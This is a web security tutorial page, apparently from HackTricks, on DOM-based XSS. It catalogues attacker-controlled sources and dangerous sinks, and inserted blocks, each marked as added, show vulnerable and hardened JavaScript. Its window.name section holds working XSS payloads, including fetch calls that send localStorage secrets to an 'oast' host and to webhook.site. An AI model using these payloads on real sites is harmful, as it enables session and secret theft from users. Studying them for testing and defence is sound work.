DOM XSS

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

DOM Vulnerabilities

DOM vulnerabilities arise when data from attacker-controlled sources (such as location.search, document.referrer or document.cookie) is passed unsafely to sinks. Sinks are functions or objects (for example eval() or document.body.innerHTML) that can execute or render harmful content when they receive malicious data.

  • Sources are inputs an attacker can manipulate, including URLs, cookies and web messages.
  • Sinks are potentially dangerous endpoints where malicious data can cause side effects such as script execution.

The risk arises when data flows from a source to a sink without proper validation or sanitization, enabling attacks such as XSS.
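The source-to-sink flow described above, written two ways. This is an added example, not code from the HackTricks page: buildGreetingUnsafe reproduces the vulnerable pattern (a location.search parameter concatenated into markup destined for innerHTML), while buildGreetingSafe escapes the value first. The parameter name (name) and the helper names are assumptions for illustration; both builders are pure functions so they can be exercised without a browser.

```javascript
// Added example (not from the page): the same location.search -> innerHTML
// flow, vulnerable and hardened. Names and the "name" parameter are assumed.

// Minimal HTML escaping for text that will land inside an element body.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Source: the query string (what a page reads from location.search).
function nameFromQuery(search) {
  return new URLSearchParams(search).get('name') ?? 'guest';
}

// Vulnerable: attacker-controlled text is concatenated straight into markup
// that the page then assigns to an HTML sink (innerHTML, document.write, ...).
function buildGreetingUnsafe(search) {
  return '<h1>Hello, ' + nameFromQuery(search) + '</h1>';
}

// Hardened: the untrusted value is escaped, so the sink renders it as text.
function buildGreetingSafe(search) {
  return '<h1>Hello, ' + escapeHtml(nameFromQuery(search)) + '</h1>';
}

// Browser wiring (only runs where a DOM exists). For plain text the safest
// sink is textContent, which needs no escaping at all.
if (typeof document !== 'undefined' && typeof location !== 'undefined') {
  const h1 = document.createElement('h1');
  h1.textContent = 'Hello, ' + nameFromQuery(location.search);
  document.body.appendChild(h1);
}
```

When the value must become markup rather than text, escaping at the sink (or using textContent) is the check a code review should look for; the source being "just a query parameter" is exactly what makes this class hard to spot.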

Tip

A more up-to-date list of sources and sinks can be found at: https://github.com/wisec/domxsswiki/wiki

Common sources:

document.URL
document.documentURI
document.URLUnencoded
document.baseURI
location
document.cookie
document.referrer
window.name
history.pushState
history.replaceState
localStorage
sessionStorage
IndexedDB(mozIndexedDB, webkitIndexedDB, msIndexedDB)
Database

Common sinks:

Open Redirect: location, location.host, location.hostname, location.href, location.pathname, location.search, location.protocol, location.assign(), location.replace(), open(), domElem.srcdoc, XMLHttpRequest.open(), XMLHttpRequest.send(), jQuery.ajax(), $.ajax()
Ajax request manipulation: XMLHttpRequest.setRequestHeader(), XMLHttpRequest.open(), XMLHttpRequest.send(), jQuery.globalEval(), $.globalEval()
HTML5-storage manipulation: sessionStorage.setItem(), localStorage.setItem()
Denial of Service: requestFileSystem(), RegExp()
Client-side SQL injection: executeSql()
Javascript Injection: eval(), Function() constructor, setTimeout(), setInterval(), setImmediate(), execCommand(), execScript(), msSetImmediate(), range.createContextualFragment(), crypto.generateCRMFRequest()
Local file-path manipulation: FileReader.readAsArrayBuffer(), FileReader.readAsBinaryString(), FileReader.readAsDataURL(), FileReader.readAsText(), FileReader.readAsFile(), FileReader.root.getFile()
Link manipulation: someDOMElement.href, someDOMElement.src, someDOMElement.action
XPath injection: document.evaluate(), someDOMElement.evaluate()
Document-domain manipulation: document.domain
Web-message manipulation: postMessage()
DOM-data manipulation: scriptElement.src, scriptElement.text, scriptElement.textContent, scriptElement.innerText, someDOMElement.setAttribute(), someDOMElement.search, someDOMElement.text, someDOMElement.textContent, someDOMElement.innerText, someDOMElement.outerText, someDOMElement.value, someDOMElement.name, someDOMElement.target, someDOMElement.method, someDOMElement.type, someDOMElement.backgroundImage, someDOMElement.cssText, someDOMElement.codebase, someDOMElement.innerHTML, someDOMElement.outerHTML, someDOMElement.insertAdjacentHTML, someDOMElement.onevent, document.write(), document.writeln(), document.title, document.implementation.createHTMLDocument(), history.pushState(), history.replaceState()
jQuery: add(), after(), append(), animate(), insertAfter(), insertBefore(), before(), html(), prepend(), replaceAll(), replaceWith(), wrap(), wrapInner(), wrapAll(), has(), constructor(), init(), index(), jQuery.parseHTML(), $.parseHTML()
Client-side JSON injection: JSON.parse(), jQuery.parseJSON(), $.parseJSON()
Cookie manipulation: document.cookie
WebSocket-URL poisoning: WebSocket

The innerHTML sink does not accept script elements in modern browsers, and svg onload events will not fire either. This means you will need to use alternative elements such as img or iframe.

This type of XSS is probably the hardest to find. You need to look into the JS code, check whether it is using any object whose value you control, and then evaluate whether there is any way to abuse it to execute arbitrary JS.

Tools to find it

Examples

Open Redirect

From: https://portswigger.net/web-security/dom-based/open-redirection

DOM-based open redirect vulnerabilities arise when a script writes attacker-controllable data to a sink that can trigger navigation to another domain.

It is important to understand that if you control the beginning of the URL to which the redirect goes, it is possible to execute arbitrary code, for example with javascript:alert(1).

Sinks:

location
location.host
location.hostname
location.href
location.pathname
location.search
location.protocol
location.assign()
location.replace()
open()
domElem.srcdoc
XMLHttpRequest.open()
XMLHttpRequest.send()
jQuery.ajax()
$.ajax()
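A redirect-target check for the sinks listed above, as an added example rather than code from the page or from PortSwigger. safeRedirectTarget resolves the untrusted value against the site origin and only lets it through when it stays on that origin over http(s); javascript: URLs, protocol-relative //host values and foreign hosts all fall back to a fixed path. The parameter name returnUrl, the origin https://app.example and the helper names are assumptions.

```javascript
// Added example (not from the page): validating a redirect target before it
// reaches location.href / location.assign(). Origin and parameter name assumed.

function safeRedirectTarget(untrusted, siteOrigin, fallback = '/') {
  let url;
  try {
    // Relative paths resolve against siteOrigin; absolute URLs keep their own origin.
    url = new URL(untrusted, siteOrigin);
  } catch {
    return fallback;                                   // unparsable input
  }
  // javascript:, data:, vbscript: and friends never pass this check.
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return fallback;
  // //evil.example, https://evil.example and backslash tricks land here.
  if (url.origin !== new URL(siteOrigin).origin) return fallback;
  // Return only the path portion: the origin is ours, so never echo it back.
  return url.pathname + url.search + url.hash;
}

// Vulnerable pattern the section describes: the raw parameter goes straight to the sink.
function redirectUnsafe(search) {
  const target = new URLSearchParams(search).get('returnUrl');
  if (typeof location !== 'undefined') location.href = target;   // sink
  return target;
}

// Hardened pattern: the value is validated before the sink sees it.
function redirectSafe(search, siteOrigin) {
  const raw = new URLSearchParams(search).get('returnUrl') ?? '';
  const target = safeRedirectTarget(raw, siteOrigin);
  if (typeof location !== 'undefined') location.assign(target);  // sink, now same-origin only
  return target;
}
```

Checking the parsed protocol and origin, rather than string-prefix matching on the raw value, is what closes the javascript: and protocol-relative cases that a startsWith('/') check misses.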

Cookie manipulation

From: https://portswigger.net/web-security/dom-based/cookie-manipulation

DOM-based cookie-manipulation vulnerabilities arise when a script writes attacker-controllable data into the value of a cookie. This can cause unexpected behaviour of the web page if the cookie is used within the site. It can also be exploited to perform session fixation attacks if the cookie is involved in tracking user sessions. The primary sink associated with this vulnerability is:

Sinks:

document.cookie

JavaScript Injection

From: https://portswigger.net/web-security/dom-based/javascript-injection

DOM-based JavaScript injection vulnerabilities arise when a script executes attacker-controllable data as JavaScript code.

Sinks:

eval()
Function() constructor
setTimeout()
setInterval()
setImmediate()
execCommand()
execScript()
msSetImmediate()
range.createContextualFragment()
crypto.generateCRMFRequest()

Document-domain manipulation

From: https://portswigger.net/web-security/dom-based/document-domain-manipulation

Document-domain manipulation vulnerabilities arise when a script uses attacker-controllable data to set the document.domain property.

The document.domain property plays a central role in how browsers enforce the same-origin policy. If two pages from different origins set document.domain to the same value, they can interact without restriction. Browsers place certain limits on the values that can be assigned to document.domain, preventing the assignment of a value completely unrelated to the page's actual origin, but exceptions exist. Typically, browsers allow the use of a child or parent domain.

Sinks:

document.domain

WebSocket-URL poisoning

From: https://portswigger.net/web-security/dom-based/websocket-url-poisoning

WebSocket-URL poisoning occurs when a script uses controllable data as the target URL of a WebSocket connection.

Sinks:

The WebSocket constructor can lead to WebSocket-URL poisoning vulnerabilities.

Link manipulation

From: https://portswigger.net/web-security/dom-based/link-manipulation

DOM-based link-manipulation vulnerabilities arise when a script writes attacker-controllable data to a navigation target within the current page, such as a clickable link or the submission URL of a form.

Sinks:

someDOMElement.href
someDOMElement.src
someDOMElement.action

Ajax request manipulation

From: https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation

Ajax request manipulation vulnerabilities arise when a script writes attacker-controllable data into an Ajax request that is issued using an XmlHttpRequest object.

Sinks:

XMLHttpRequest.setRequestHeader()
XMLHttpRequest.open()
XMLHttpRequest.send()
jQuery.globalEval()
$.globalEval()

Local file-path manipulation

From: https://portswigger.net/web-security/dom-based/local-file-path-manipulation

Local file-path manipulation vulnerabilities arise when a script passes attacker-controllable data to a file-handling API as the filename parameter. An attacker may exploit this by constructing a URL that, if visited by another user, causes the user's browser to open or write an arbitrary local file.

Sinks:

FileReader.readAsArrayBuffer()
FileReader.readAsBinaryString()
FileReader.readAsDataURL()
FileReader.readAsText()
FileReader.readAsFile()
FileReader.root.getFile()

Client-side SQL injection

From: https://portswigger.net/web-security/dom-based/client-side-sql-injection

Client-side SQL-injection vulnerabilities arise when a script incorporates attacker-controllable data into a client-side SQL query in an unsafe way.

Sinks:

executeSql()

HTML5-storage manipulation

From: https://portswigger.net/web-security/dom-based/html5-storage-manipulation

HTML5-storage manipulation vulnerabilities arise when a script stores attacker-controllable data in the web browser's HTML5 storage (localStorage or sessionStorage). Although this behaviour is not inherently a security vulnerability, it becomes a problem if the application later reads the stored data and processes it unsafely. This can allow an attacker to use the storage mechanism to deliver other DOM-based attacks, such as cross-site scripting and JavaScript injection.

Sinks:

sessionStorage.setItem()
localStorage.setItem()

XPath injection

From: https://portswigger.net/web-security/dom-based/client-side-xpath-injection

DOM-based XPath-injection vulnerabilities arise when a script incorporates attacker-controllable data into an XPath query.

Sinks:

document.evaluate()
someDOMElement.evaluate()

Client-side JSON injection

From: https://portswigger.net/web-security/dom-based/client-side-json-injection

DOM-based JSON-injection vulnerabilities arise when a script incorporates attacker-controllable data into a string that is parsed as a JSON data structure and then processed by the application.

Sinks:

JSON.parse()
jQuery.parseJSON()
$.parseJSON()

Web-message manipulation

From: https://portswigger.net/web-security/dom-based/web-message-manipulation

Web-message vulnerabilities arise when a script sends attacker-controllable data as a web message to another document within the browser. An example of vulnerable web-message manipulation can be found in PortSwigger's Web Security Academy.

Sinks:

The postMessage() method used to send web messages can lead to vulnerabilities if the event listener that receives the messages handles the incoming data unsafely.
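The receiving side of the exchange just described, as an added example that is not part of the page or of PortSwigger's material: a message listener written the unsafe way (trust any sender, hand the payload to an HTML sink) beside a hardened one (exact origin check, structured message, field validation, text sink only). The handlers take the MessageEvent-like object ({origin, data}) and a sink callback so the logic can be exercised without a browser; the trusted origin https://partner.example, the message shape and the element id status are assumptions.

```javascript
// Added example (not from the page): postMessage listeners, unsafe vs hardened.
// TRUSTED_ORIGIN, the {type, text} message shape and the #status element are assumed.

const TRUSTED_ORIGIN = 'https://partner.example';   // assumed trusted sender

// Vulnerable: trusts any sender and hands the raw payload to an HTML sink.
function handleMessageUnsafe(event, sink) {
  sink(event.data);                                   // e.g. el.innerHTML = event.data
  return true;
}

// Hardened: checks the exact origin (not a substring or regex match), requires
// a structured message, validates the one field it needs, and writes it to a
// text sink only.
function handleMessageSafe(event, sink) {
  if (event.origin !== TRUSTED_ORIGIN) return false;               // wrong sender
  const msg = event.data;
  if (!msg || typeof msg !== 'object' || msg.type !== 'status') return false;
  if (typeof msg.text !== 'string' || msg.text.length > 200) return false;
  sink(msg.text);                                                  // e.g. el.textContent = msg.text
  return true;
}

// Browser wiring, only where a window exists.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  const out = document.getElementById('status');
  window.addEventListener('message', (e) => {
    if (out) handleMessageSafe(e, (t) => { out.textContent = t; });
  });
}
```

Two details matter in review: the origin comparison must be an exact equality (origin.includes('partner.example') also matches https://partner.example.evil.test), and even a trusted sender's data should reach a text sink, not innerHTML, because the sender may itself be relaying untrusted input.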

DOM-data manipulation

From: https://portswigger.net/web-security/dom-based/dom-data-manipulation

DOM-data manipulation vulnerabilities arise when a script writes attacker-controllable data to a field within the DOM that is used in the visible UI or in client-side logic. An attacker can exploit this to construct a URL that, if visited by another user, modifies the appearance or behaviour of the client-side UI.

Sinks:

scriptElement.src
scriptElement.text
scriptElement.textContent
scriptElement.innerText
someDOMElement.setAttribute()
someDOMElement.search
someDOMElement.text
someDOMElement.textContent
someDOMElement.innerText
someDOMElement.outerText
someDOMElement.value
someDOMElement.name
someDOMElement.target
someDOMElement.method
someDOMElement.type
someDOMElement.backgroundImage
someDOMElement.cssText
someDOMElement.codebase
document.title
document.implementation.createHTMLDocument()
history.pushState()
history.replaceState()

Denial of Service

From: https://portswigger.net/web-security/dom-based/denial-of-service

DOM-based denial-of-service vulnerabilities arise when a script passes attacker-controllable data unsafely to a problematic platform API, such as an API that, when called, can cause the user's computer to consume excessive CPU or disk space. This can have serious side effects that restrict the website's functionality, such as the browser refusing further attempts to store data in localStorage or terminating busy scripts.

Sinks:

requestFileSystem()
RegExp()

DOM Clobbering

Implicit globals & window.name abuse

Referencing name without a declaration (var/let/const) resolves to window.name. Because window.name persists across cross-origin navigations, an attacker can pre-populate a browsing context's name with HTML/JS and later have the victim code render it as trusted data:

  • Open or navigate the target from a named context you control:
<iframe name="<img src=x onerror=fetch('https://oast/?f='+btoa(localStorage.flag))>" src="https://target/page"></iframe>
  • Or reuse window.open with a crafted target name:
window.open('https://target/page', "<svg/onload=alert(document.domain)>")

If the application later runs element.innerHTML = name (or a similar sink) without sanitization, the attacker-controlled window.name string executes in the target origin, yielding DOM XSS and access to same-origin storage.

Admin/automation flows: pre-populated storage & javascript: navigation

Automation bots (e.g. Playwright) often first visit an internal page to set secrets in localStorage/cookies and then navigate to a user-supplied URL. Any DOM XSS primitive in that flow (including window.name abuse) can exfiltrate the pre-populated secrets:

fetch('https://webhook.site/<id>?flag=' + encodeURIComponent(localStorage.getItem('flag')))

If the bot does not restrict schemes, supplying a javascript: URL (javascript:fetch(...)) executes in the current origin without a new navigation and leaks the storage values directly.
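The defensive counterpart to the window.name source described in this section, as an added example that is not part of the page: takeWindowName reads the value through an explicit object reference (never a bare name, which is the implicit global the section warns about), accepts it only if it matches an allowlist pattern, and clears it so the value does not persist into the next navigation. The allowlist pattern and the helper name are assumptions for illustration; the function takes the window object as a parameter so it can be tested with a constructed stand-in.

```javascript
// Added example (not from the page): treat window.name as an untrusted source.
// NAME_ALLOWLIST and takeWindowName are assumed names, not from the page.

const NAME_ALLOWLIST = /^[A-Za-z0-9_-]{1,64}$/;   // assumed: short identifier-like names only

function takeWindowName(win) {
  // window.name is always a string in a browser; the guard covers stand-ins.
  const raw = typeof win.name === 'string' ? win.name : '';
  // Clear it so an attacker-supplied value does not survive into later pages
  // on this origin, whichever code reads it next.
  win.name = '';
  // Markup, script fragments and oversized values never pass the allowlist.
  return NAME_ALLOWLIST.test(raw) ? raw : null;
}

// Usage in a page: declare the local explicitly, then use the result only as
// a lookup key (never as HTML):
//   const step = takeWindowName(window);
//   if (step !== null) showStep(step);
```

Declaring the local variable is itself part of the fix: an undeclared name silently becomes window.name, which is how the implicit-global flow above begins.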

References
